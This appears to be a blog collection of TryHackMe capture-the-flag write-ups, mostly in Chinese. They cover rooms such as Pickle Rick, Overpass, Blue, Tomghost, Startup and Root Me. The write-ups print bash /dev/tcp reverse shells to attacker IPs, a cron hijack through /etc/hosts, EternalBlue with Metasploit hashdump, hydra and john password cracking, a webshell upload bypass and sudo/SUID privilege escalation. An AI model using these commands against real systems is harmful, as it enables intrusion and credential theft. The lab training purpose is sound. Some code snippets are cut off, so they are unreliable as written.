猜測他可能是 admin 密碼使用RDP連 Admin- xfreerdp +drives /u:Administrator /v:10.10.18.8:3389
使用密碼 ChangeMeBaby1MoreTime取得 admin 權限-
THM{Y0U_4R3_1337}

Pickle Rick (Try Hack Me Writeup)

Thu, 29 Jul 2021 13:11:00 +0800

URL : https://tryhackme.com/room/picklerick
IP: 10.10.223.99

Recon

nmap -A 10.10.223.99
22 port
80 port首頁原始碼-
提示 username : R1ckRul3srobots.txt-
Wubbalubbadubdub

使用 Username : R1ckRul3s
Password : Wubbalubbadubdub

Webshell

進入後就是一個 webshell戳成 reverse shellbash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'Flag1-
在 web 目錄
mr. meeseek hairFlag2-
在 rick 家目錄
1 jerry tearFlag3-
發現可以直接 sudo su
所以就進 root 取得最後一個 flag
fleeb juice

Overpass (Try Hack Me Writeup)

Tue, 27 Jul 2021 13:07:00 +0800

URL : https://tryhackme.com/room/overpass
IP : 10.10.214.180

Scan

首先是老梗的用 Nmap 掃一下nmap -A 10.10.214.180
發現基本上只有開 ssh 跟 http接下來用 dirsearch 掃一下路徑- python3 dirsearch.py -u http://10.10.214.180/ -e all
看起來基本上比較有趣的只有 /admin/admin 介面- 基本上就是一個滿普通的登入介面，可以輸入帳號或密碼對著登入介面做了一些盲測的 SQLi'or'1'='1 --
之類的都沒有反應

ROT47 (多走的彎路QQ)

- 選到 About 看了一下，簡介是說他們曾經因為密碼在 rockyou 裡面，所以感到很失望，創了一個密碼管理軟體到 Downloads 來看一下他們的密碼軟體- 他們有 source code
http://10.10.129.94/downloads/src/overpass.go
擷取重點發現- 是一個用 Go 語言寫的密碼管理軟體，而他們的加密使用了 ROT47 的加密算法

//Secure encryption algorithm from https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example
func rot47(input string) string {
 var result []string
 for i := range input[:len(input)] {
 j := int(input[i])
 if (j >= 33) && (j

```python
def rot47(s):
 x = []
 for i in range(len(s)):
 j = ord(s[i])
 if j >= 33 and j 我心裡的猜想- 它們之前的密碼是用 rockyou 的密碼，現在在推他們自己的密碼管理軟體，使用 ROT47
- 該不會……可以爆破 web 介面密碼，使用 ROT47 後的 rockyou 吧?
- 所以寫了以下的 Code 來把 rockyou 轉 ROT47

```python
def rot47(s):
 x = []
 for i in range(len(s)):
 j = ord(s[i])
 if j >= 33 and j 所以就把所有的使用者準備成一個 txt (每個人名換一行)使用 Hydra 進行爆破- `hydra -L user_l.txt -P rot47rock.txt 10.10.214.180 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect credentials"`跑ㄌ很久也沒用沒用QQ

## 觀察登入程式碼

- 爆破畢竟是下下策，還是先觀察一下登入介面的原始碼有什麼東東
- 就發現了一個 login.jshttp://10.10.214.180/login.js
- 擷取重要的弱點- 跑到 elase 代表登入成功，會寫入一個餅乾餅乾名稱 : "SessionToken"
- 餅乾值 : statusOrCookie

```javascript
if (statusOrCookie === "Incorrect credentials") {
 loginStatus.textContent = "Incorrect Credentials"
 passwordBox.value=""
 } else {
 Cookies.set("SessionToken",statusOrCookie)
 window.location = "/admin"
 }

直接用 Firefox 新增一個餅乾名稱用 “SessionToken”， Value 亂寫
然後就登進去了!!!
上面直接留了一串 Private Key，也寫說是給 james 的

那我們當然就把這一串存到自己的電腦，再嘗試 run 看看囉!!chmod 600 James_key.pem
ssh james@10.10.214.180 -i James_key.pem
發現 key 需要用密碼!爆密碼- 老梗，請約翰出場，先找 ssh2john 把 key 轉 john 的格式python3 ../ssh2john.py James_key.pem > James_john.txt再來就 run john 囉!john James_john.txt --wordlist=/opt/rockyou.txt- 密碼就出來囉!!
james13
(其實我先跑了 rot47 的密碼，但失敗了QQ)使用 ssh 進行登入- ssh james@10.10.214.180 -i James_key.pem
搭配密碼 james13
成功登入!
取得 user.txt``thm{65c1aaf000506e56996822c6281e6bf7}

提權

之前我們都用 Linenum，這次來換換口味，使用小豌豆 Linpeas 吧!先把檔案 scp 上去
scp -i James_key.pem ../linpeas.sh james@10.10.214.180:/home/james馬上就噴出了一個很重要的 Cron job- 小豌豆好棒棒!!!
每分鐘會用 root 權限 curl 一次 overpass.thm 的網址，然後把值丟去bash發現 /etc/hosts 沒有設權限- 所以我們可以把 overpass.thm 轉到自己的伺服器上
在自己的電腦上準備一個資料夾路徑- downloads/src/buildscript.sh 的檔案
內容物為自己的 Reverse shellbash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'然後在自己的電腦上開一下 nc 進行監聽- nc -vlk 7877
開啟 Python server- python3 -m http.server攻擊戳回來了!!!-
取得 root flag-
thm{7f336f8c359dbac18d54fdd64ea753bb}

Blue (Try Hack Me Writeup)

Sun, 25 Jul 2021 23:54:00 +0800

URL : https://tryhackme.com/room/blue
IP : 10.10.158.118

Recon

Q: How many ports are open with a port number under 1000?nmap -p 1-1000 10.10.158.118
回傳 3 個135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds老規矩習慣的 nmap -A 10.10.158.118 看看- Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)- nmap 看到的 Windows7 版本拿去 Googlewindows 7 professional 7601 service pack 1 exploit就會出現 MS17-010 EternalBlue

Metasploit

開啟 msfconsole搜尋 search MS17-010
選擇 exploit/windows/smb/ms17_010_eternalblue輸入 use exploit/windows/smb/ms17_010_eternalblue- 輸入 show options
設定需要的 optionsset RHOSTS 10.10.158.118
set LHOST 10.14.7.198輸入 set payload windows/x64/shell/reverse_tcp輸入 exploit- 成功拿到 shell!
輸入 whoami 可以發現，其實已經是 system 權限了

使用 Meterpreter

存參https://paper.seebug.org/29/簡單來說，Meterpreter是提供給"後滲透"使用- 也就是說，比起cmd有更多方便的功能醬子
例如 getsystem 可自動提權Google shell_to_meterpreter- 取得 post/multi/manage/shell_to_meterpreter``use post/multi/manage/shell_to_meterpreter- show options
set LHOST 10.14.7.198
確定剛剛我們 ctrl + z 的 session輸入 sessions
set SESSION 1``run- 輸入 sessions- 可以看到目前有兩個 session
選第 2 個輸入 sessions 2進入 shell- 輸入 shell
輸入 whoami確定目前自己是 nt authority\system按下 Ctrl + Z 回到 Meterpreter 選單- 輸入 ps 觀察目前系統執行的 process尋找最後一個 process3056 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe輸入 migrate 3056 遷移到 PID 上輸入 hashdump- 可以看到不同使用者的 hash
看起來一般的使用者應該是 Jon把 Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: 存成 txt 用 john 來破- john jon.txt --format=NT --wordlist=/opt/rockyou.txt
1 秒鐘就爆出來ㄌ alqfna22

各種 Flag

Flag1? This flag can be found at the system root.type flag1.txt``flag{access_the_machine}Flag2? This flag can be found at the location where passwords are stored within Windows.- 他說 Flag 存在 Windows 存密碼的地方
Windows 的密碼 hash 存在 C:\Windows\System32\config
裡面有 `type flag2.txt``flag{sam_database_elevated_access}flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.- 其實我覺得這裡有一點點暴力，但這一題真的有點通靈
已經發現前兩隻 flag 檔名是 flag1.txt , flag2.txt
所以我想說直接在 C槽根目錄爆搜dir flag*.txt /s /p
然後就噴出來ㄌ www
flag{admin_documents_can_be_valuable}
這也提醒我們，可以觀察使用者的 Documents 或 Desktop但據我所知大多數的台灣人並沒有用 “我的文件” ㄉ習慣 www

Basic Pentesting (Try Hack Me Writeup)

Sat, 24 Jul 2021 23:51:00 +0800

URL : https://tryhackme.com/room/basicpentestingjt

Target IP : 10.10.165.235

Scanning

nmap -A 10.10.165.235

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
 |_nbstat: NetBIOS name: BASIC2, NetBIOS user: , NetBIOS MAC: (unknown)
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: basic2
 | NetBIOS computer name: BASIC2\x00
 | Domain name: \x00
 | FQDN: basic2
 |_ System time: 2021-07-24T04:41:05-04:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 | smb2-security-mode:
 | 2.02:
 |_ Message signing enabled but not required
 | smb2-time:
 | date: 2021-07-24T08:41:04
 |_ start_date: N/A

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds

The open port is22 SSHOpenSSH 7.2p2 - Username Enumeration80 HTTP- Apache/2.4.18 : no vulnerability139、445 SMB- Samba smbd 4.3.11-Ubuntu : no vulnerability8009 AJP138080 Tomcat

Access Website (80 port)

Use dirsearchpython3 dirsearch.py -u http://10.10.165.235/ -e allQuestion1 : What is the name of the hidden directory on the web server(enter name without /)?- developmentAfter access the development page, we can get 2 files-
They are some mail from J and K to talk about some upgrade smb issue.

Try to find the username

enum4linux 10.10.165.235 -a
So there are 2 username we findkay and janAlthough the verison of SSH services is 7.2p2, it has a vulnerability with Username Enumeration- https://www.exploit-db.com/exploits/40136
But I have tried and it doesn’t work

What is the password?

We need to burp force the password for these 2 users
Use hydra to check with rockyou.txthydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235
hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
We find the password : armando with user jan

ssh jan@10.10.165.235
We are login with jan, but we can’t cat /home/kay/pass.bakAnd then we find some cool things at `/home/kay/.ssh‵-
This is the login key file he/she forgot to remove, so we can login with ssh without password, we can try to scp it to our computer by scp -r jan@10.10.165.235:/home/kay/.ssh .Use ssh command to try to login with kay- chmod 600 id_rsa
ssh kay@10.10.165.235 -i id_rsa
But the key file needs password, so we need to crak

Crack ssh key

Use ssh2john
python ssh2john.py id_rsa > john_sshRun john with wordlist rockyou- john john_ssh --wordlist=/opt/rockyou.txt
So password is beeswax

And we can find the final flag!heresareallystrongpasswordthatfollowsthepasswordpolicy

Final Screenshot

Tomghost (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:28:00 +0800

URL : https://tryhackme.com/room/tomghost

IP : 10.10.9.138

Scanning

nmap -A 10.10.9.138
有開的 port22 SSH 7.2ps
53 tcpwarpped
8009 AJP13 1.3
8080 Tomcat 9.0.30

Exploit

使用 searchsploit 搜尋 AJPsearchsploit AJP
可以找到 Apache Tomcat - AJP 'Ghostcat File Read/Inclusionhttps://www.exploit-db.com/exploits/48143`wget https://www.exploit-db.com/download/48143``mv 48143 48143.py``python 48143.py`-
就直接噴出帳號密碼ㄌ帳號 : skyfuck
密碼 : 8730281lkjlkjdqlksalks

SSH 進去晃晃

ssh skyfuck@10.10.9.138
發現家目錄裡面有兩個檔案
先抓出來scp -r skyfuck@10.10.9.138:/home/skyfuck .在 /home/merlin 發現 user.txt- THM{GhostCat_1s_so_cr4sy}

暴力破解 pgp

看到一個 asc 檔案跟一個 pgp 檔案用 file 觀察他們在幹嘛
.pgp 是加密後ㄉ東西
.asc 的是 private keypgp 轉 john- gpg2john tryhackme.asc > john_gpg
備註 : gpg 是開源版本的 pgpref :　https://zh.wikipedia.org/wiki/PGP我們要破的是 .asc 的 private key 檔案求密碼用 john 爆破，With rockyou.txt- john john_gpg --wordlist=/opt/rockyou.txt
破出密碼為 alexandru``gpg --decrypt credential.pgp- 輸入密碼
取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

提權

su merlin輸入密碼sudo -l- (root : root) NOPASSWD: /usr/bin/zip
發現有 zip 的 sudo 權限到 GTFOBins 找 zip 提權方法- 可以 sudo 的TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'提權成功-
root.txt : THM{Z1P_1S_FAKE}

Startup (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:22:00 +0800

URL : https://tryhackme.com/room/startup
Target IP : 10.10.37.216

Scan

老規矩 nmap 起手式nmap -A 10.10.37.216
有開21 FTPnmap 說 Anonymous allow22 SSH80 網頁掃網頁路徑- python3 dirsearch.py -u http://10.10.37.216/ -e all
可能有用的路徑http://10.10.37.216/files/裡面有一段話，跟 meme

FTP

ftp 10.10.37.216帳號 : Anonymous
密碼 : 空白
發現路徑就是網頁伺服器的files嘗試上傳檔案- 根目錄(網頁的 files)
沒有權限ftp 目錄-
有權限ㄌ!

Shell

訪問 http://10.10.37.216/files/ftp/b374k.php使用預設密碼轉用 Reverse Shell- 本地端準備 nc -vlk 7877
在 Terminal 輸入 bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'切換為交互式 shell- python -c 'import pty; pty.spawn("/bin/bash")'

亂逛系統

根目錄底下recipe.txt``Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
問題 : What is the secret spicy soup recipe?
答案 : loveincidents 資料夾- 裡面有 suspicious.pcapng
透過 webshell 把他載下來備用使用者相關- /home 底下有 lennie 使用者

解析 pcap

觀察第 45 個封包 follow TCP stream可以看到 webshell 的紀錄
其中輸入了密碼 c4ntg3t3n0ughsp1c3

嘗試登入使用者

回到 reverse shell 輸入 su lennie 並搭配上述密碼
登入成功!!取得 user.txt-
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

研究提權

在使用者資料夾裡找到 scripts 資料夾
兩個檔案權限都是 root，但我們可以進行讀取
planner.sh看起來會把環境變數 $LIST 給寫到 startup_list.txt接著呼叫 /etc/print.sh

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

觀察 /etc/print.sh 可以發現我們有 write 的權限-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh在 print.sh 下面加上一行 reverse shell- echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
當然這邊的 port 要跟目前的不同，然後本地開 nc -vlk 8778 來聽
然後連指令都還沒執行，就莫名地拿到 root ㄌ ?__?
THM{f963aaa6a430f210222158ae15c3d76d}

為什麼誤打誤撞拿到 root ㄌ，還是要來研究一下

跑 Linpeas準備 linpeas.sh 在本地python3 -m http.server回到使用者端- wget 10.14.7.198:8000/linpeas.sh
bash linpeas.sh | tee meow.txt看不出什麼結果使用 Pspy- 用上述同樣方法載到被駭機觀察
發現每分鐘都會用 UID=0 執行一次 planner.sh
所以應該是一個 root 的 cron job進入root後- 輸入 crontab -l
就能看到這條 cron job 了我還是覺得這一段有一點點通靈 QQ

Root Me (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:15:00 +0800

題目網址 : https://tryhackme.com/room/rrootme

目標IP : 10.10.233.205

Scanning

起手式 nmapnmap -A 10.10.233.205
22 : SSH7.6p1 有枚舉的漏洞 CVE-2018-15473
https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py80 : Apache- Apache httpd 2.4.29nmap 掃描的同一時間，先打開網頁看看-
網頁起手式 dirsearchpython3 dirsearch.py -u http://10.10.233.205/ -e all
看起來可能會有趣的路徑/panel/
/uploads/

上傳 webshell

/panel/ 可以上傳檔案
用 Wappalyzer 可以確定他是 PHP上傳個 b374k.php-
會噴錯，Google翻譯說 PHP是不允許的！ (葡萄牙文)使用 php 副檔名解析漏洞測試- Apache 1.x 2.x 文件解析特性BJ4測試檔名 b374k.php.aaa- Google 翻譯 :文件上傳成功！

使用 Webshell

點下面的 Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
使用預設密碼就能進入 shell

戳入 Reverse Shell

Webshell 滿好用的，但是Reverse shell用起來更爽確認攻擊機 ip 為 10.14.7.198終端機輸入 nc -vlk 7877webshell 的 Terminal 輸入- bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'即可順利連上 Reverse shell- 輸入指令讓他變得更 interactive 一點- python -c 'import pty; pty.spawn("/bin/bash")'

在電腦裡面逛大街

user.txt
THM{y0u_g0t_a_sh3ll

設法提權

使用內建的上傳功能上傳 LinEnum.sh開權限 chmod +x LinEnum.sh
執行，並存到檔案 ./LinEnum.sh | tee meow.txt
基本上優先注意紅色、橘色的東西找到有趣ㄉ東西!! [+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python- 也就是說 /usr/bin/python 可以用 SUID 執行
到 GTFOBins 找 Python 有 SUID 的提權方法python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

提權成功!!

Flag : THM{pr1v1l3g3_3sc4l4t10n}

About

Mon, 01 Jan 0001 00:00:00 +0000

喵